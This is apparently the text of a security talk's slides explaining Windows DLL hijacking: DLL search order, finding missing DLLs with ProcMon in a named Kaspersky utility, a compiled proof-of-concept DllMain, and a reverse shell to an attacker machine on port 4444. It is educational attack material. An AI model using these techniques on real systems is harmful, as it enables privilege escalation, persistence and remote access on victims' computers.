Microsoft's implementation of the shared library concept. A DLL file contains code and data that can be used by multiple programs at the same time, hence it promotes code reuse and modularization. This brief tutorial provides an overview of Windows DLL along with its usage. Basically DLL file contains functions, variables, resources and classes which are used by executable for it’s functioning. For Example : KERNEL32.DLL – Contains functions for Memory management and other processes USER32.DLL – Contains user interface functions To use these functions, the application have to import library files. The two ways an application imports functions from modules are Load-Time Dynamic Linking and Run-Time Dynamic Linking Load-Time Dynamic Linking : This linking is statically linking application to a “.lib” or “.a” file which contains code for automatically executing runtime links from “.dll” files on the initial stage of program startup. Run-Time Dynamic Linking : We use LoadLibrary() or LoadLibraryEx() function to load DLLs with the fix path or DLL name If DLL is not found in current directory by using above methods, then executable uses DLL Search Order to locate DLLs in the system. We’ll see about DLL Search Order in next few slides!
the program, Malicious DLL is loaded by executable Step 1 Imposters are crackers, who cracks DLL hijacking vulnerable applications! Step 4 Malicious DLL contains reverse shell or any type of arbitrary code execution which is triggered with elevated privileges Step 2 Victim Downloads the cracked software which has malicious DLLs Step 5 Attacker gets access to victim’s pc on his C2 server
to find DLLs requested by an application. The Search Order is followed like this as per Microsoft Documentation if SafeDllSearchMode is disabled: 1. The Directory from application loaded 2. The Current Directory 3. The System Directory. Windows uses GetSystemDirectory function to get path of this directory 4. The 16-bit system directory . No function for this but it somehow searches it 5. The Windows Directory. Windows uses GetWindowsDirectory function to get path of this directory 6. The Directories listed in PATH Environment Variables.
malicious code into an application by exploiting missing DLLs and tricking Windows Search Order. Now if a application requires any DLL for its functionality but the DLL is doesn’t exist or not implemented in secure way, There could be a good chance of DLL Hijacking Here, An attacker can himself or trick user to replace the malicious DLL from original DLL to the missing DLL Path then whenever the application will executed then functions from malicious DLL will be executed and code execution will be achieved.
can execute arbitrary code in order to perform malicious actions or persistence could also can be achieved to use as backdoor Attacker can escalate privileges from normal user to highly privileges (Administrator)
Hijacking Vulnerability on any application, You’ll need Process Monitor (ProcMon) with you • ProcMon is Sys Internal Tool in Windows used for monitoring processes. You can call it Task Manager 2.0 • For demonstrating this attack, we’ll use vulnerable version of kavremover.exe (support.kaspersky.com/downloads/utils/kavremover.exe) • Let’s see how to hunt this
We can use Metasploit or you can write your own code for performing malicious actions Now place this malicious DLL on the missing location (In our case, We have dll missing on Desktop so we have place this Malicious DLL on Desktop)
own desired actions. Here is the example code from Hacktricks (https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking#your-own). To compile this, run PowerShell as Administrator and run this command : g++.exe dll.c -lws2_32 -o srrstr.dll –shared. This code will run calculator and throw out of ipconfig to C:\users\username\ipconfig.txt as PoC. #include <windows.h> BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){ switch(dwReason){ case DLL_PROCESS_ATTACH: system("ipconfig > C:\\users\\username\\ipconfig.txt"); WinExec("calc.exe", 0); break; case DLL_PROCESS_DETACH: break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; } return TRUE; }
but we are not going to cover in deep for now. If we load our DLL in IDA and Click on View -> Open Subview -> Strings, We can have some idea about what DLL contains We can see “whoami > C:\\users\\india\\whoami.txt” is operation being performed on system and “calc.exe” can maybe trigger as shown in next line.
in Process Explorer and see what we can find A unknown process is been created on running kavremover which is using cmd.exe and properties of the process shows that this process has remote connection to 192.168.0.109 on port 4444 which is our attacker machine!!
by Flaticon, infographics & images by Freepik Thanks! Do you have any queries? Twitter : @purab_parihar LinkedIn: linkedin.com/in/purabparihar Instagram: @purabparihar
purabparihar
visional_engineering_and_design
moriyuya
rfdnxbro
nyankotaro
_kensh
kasada
kumaiu
makikub
hiroakis
phaya72
ozakiomumkj
eileencodes
frankvandijk
baasie
bkeepers
ipullrank
danielanewman
cassininazir
thirion
sabderemane
mkilby
sonatard
aleyda
